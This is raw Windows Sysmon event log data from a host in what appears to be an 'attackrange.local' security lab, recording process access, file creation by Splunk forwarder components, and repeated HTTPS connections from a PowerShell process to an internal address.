21:50:26.980{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.980{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.980{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-81A2-613A-9596-03000000C801}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.980{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81A2-613A-9596-03000000C801}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.975{B81B27B7-81A2-613A-9596-03000000C801}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.827{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A638DD2FB47E464B2A0D1361B290C31,SHA256=4FC3712EBDBC7A5338C452D9611459EF5232D5F7043F685842B47485404869D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:26.328{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7E198D86F93085D023C71555FB7EC36F,SHA256=E4DF74E2B6C81A59B1C44593DF675E8652C17AB80DDB4E3662228DBD4C2CF020,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:27.858{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F16A1407A55BD83E2CEC6CEA9446310E,SHA256=FE0AFD745C3AD4A6B94B764FE0DA7FD94DE2A080285C20BE23AD5593C6A26C52,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:27.826{B81B27B7-81A3-613A-9696-03000000C801}66124300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:27.658{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81A3-613A-9696-03000000C801}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:27.658{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:27.658{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:27.658{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:27.658{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:27.658{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-81A3-613A-9696-03000000C801}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:27.658{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81A3-613A-9696-03000000C801}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:27.643{B81B27B7-81A3-613A-9696-03000000C801}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035126850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:51.504{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61948-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:28.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C48DC0AF0F0765C3CC084786E1605F7,SHA256=CC0D25E90313604DE60C4C36984AADE730E924B24F930D5069421C0659712D3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:28.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1524CA25A49CA1117F2C2665DA9E65F,SHA256=43F7B1888B8F6E49DCD4E7A57E5CB74D62A8FA0C0413B3D816ED3A3F2D6262CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:28.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87C4C5326796556BC3862729F710440C,SHA256=44194375A660157B12641CB40A24A6B0E61C469BAD402A2E0D3FD2F781A1CE97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:29.877{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E3AB76AB743FC500CF4B584FE7E91A3,SHA256=0EBFD88AC5C745D99CFFDB2D5BFC5037FA8F2847A82C507C400190BB0FE3FF31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:53.349{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61949-false10.0.1.12-8000- 23542300x800000000000000035126868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:30.891{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5142CD4D2683CEBE402527C28C83CDF4,SHA256=169798E34A66A8E4D6478E4391B679BFB3BA0351F697306200BE9A1DA0A3F7F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:55.517{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61950-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:30.376{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D486ABAED7872E5CDB695F2807F3B439,SHA256=94AA46BA35A454C75E2B2AE171416E49C4293F6C15F82374005E6559B2E007EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:31.907{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F8DCEA8073D6EB9184BDC70CD46C5F3,SHA256=DC446E2D97264F0BBFFD4CD4F71A4C7193F0E823D34365DC202B8BBB09AD406C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:32.921{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DE898BF4128C846D7ED145D96539DA2,SHA256=EAEBB80CDC848459C8246DA143DDDFCC49B2CEF51B1733CF724B0919DC48AE4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:33.936{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C43E4CFF3C3EBD4AB2A2340D2612208,SHA256=3F78DC8B43809E7DE9CFFEAB036557F030BD8EE5ADE8A19EDDAB7DF6B2F4D92B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:34.968{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92E18F19F1469730BF0EAB2B7C443244,SHA256=6D9A07A18446602532C07F8C7EC59B50035F5D457C55C4590A06DEE3B39D2F51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:35.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E79E361E1EE1C524490AF5E18E3C7B5,SHA256=28810B9ECE52AF7E4ADF1744484D31AD035AC47A795C884C8593912B253DDCC2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:59.312{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61951-false10.0.1.12-8000- 354300x800000000000000035126876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:01.526{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61952-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:36.470{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F540668EF57115C537226C3327ECFA89,SHA256=FAB5A961383319412A7F2FD09B331726073FE4751B88145A14CB903A80B3B962,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:37.948{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=484B669FAA3C167FD21696ACD17AE4A2,SHA256=493F3DBA617F62E6D272DFBF95A2933968B3A29A2E613696A76F68E4E6941847,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:37.002{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F97DA535FBABBA181CE2D19BA93C001,SHA256=3D120A2B917F5407CF9C6A0CC75A087DB5ABA93F8076B1044CC8F5BEAA7FABD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:38.016{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=006F1F5EC2BA84B41E40984A9EA802B1,SHA256=903952BEBC3A84F4BA5F13B961E5886F1B73CFFEA84824522784E1E14F966381,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:39.031{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2C9BCBD67CF1304A8D939D1FED56152,SHA256=78CBEBBDC10C16F4676ACF0544B68518C551F32692B52C096712DDEF22889B28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:40.848{B81B27B7-81B0-613A-9796-03000000C801}41766700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035126892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:05.538{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61954-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035126891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:05.238{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61953-false10.0.1.12-8000- 10341000x800000000000000035126890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 